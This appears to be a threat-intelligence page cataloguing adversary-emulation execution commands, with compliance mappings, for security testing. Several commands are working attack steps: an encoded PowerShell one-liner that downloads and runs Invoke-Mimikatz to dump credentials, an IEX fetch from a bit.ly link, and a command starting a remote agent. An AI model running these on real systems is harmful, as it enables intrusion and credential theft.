executionwindowsEmulate Administrator Tasks
start powershell.exe -ArgumentList "-NoP","-StA","-ExecutionPolicy","bypass",".\Emulate-Administrator-Tasks.ps1"
executionwindowsImpersonate user
$job = Start-Job -ScriptBlock {
  $username = '#{host.user.name}';
  $password = '#{host.user.password}';
  $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
  $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
  Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential;
};
Receive-Job -Job $job -Wait;
executionwindowsPowerShell Invoke MimiKats
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvAEUAbQBwAGkAcgBlAC8ANwBhADMAOQBhADUANQBmADEAMgA3AGIAMQBhAGUAYgA5ADUAMQBiADMAZAA5AGQAOAAwAGMANgBkAGMANgA0ADUAMAAwAGMAYQBjAGIANQAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==
executionwindowsPowerShell bitly Link Download
powershell.exe -c IEX (New-Object Net.Webclient).downloadstring("https://bit.ly/33H0QXi")
executiondarwin, linuxStart 54ndc47
nohup ./sandcat.go -server #{server} &
executionwindowsStop PowerShell processes
Get-Process -Name "powershell" | Stop-Process

Comply & Defend

NIST 800-53AC-02, AC-03, AC-05, AC-06, AC-17, CA-07, CM-02, CM-05, CM-06, CM-07, CM-08, CM-11, IA-02, IA-08, IA-09, RA-05, SC-18, SI-02, SI-03, SI-04, SI-07, SI-10, SI-16
OWASPM4:2024, A03:2021
D3FEND12 defensive techniques
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin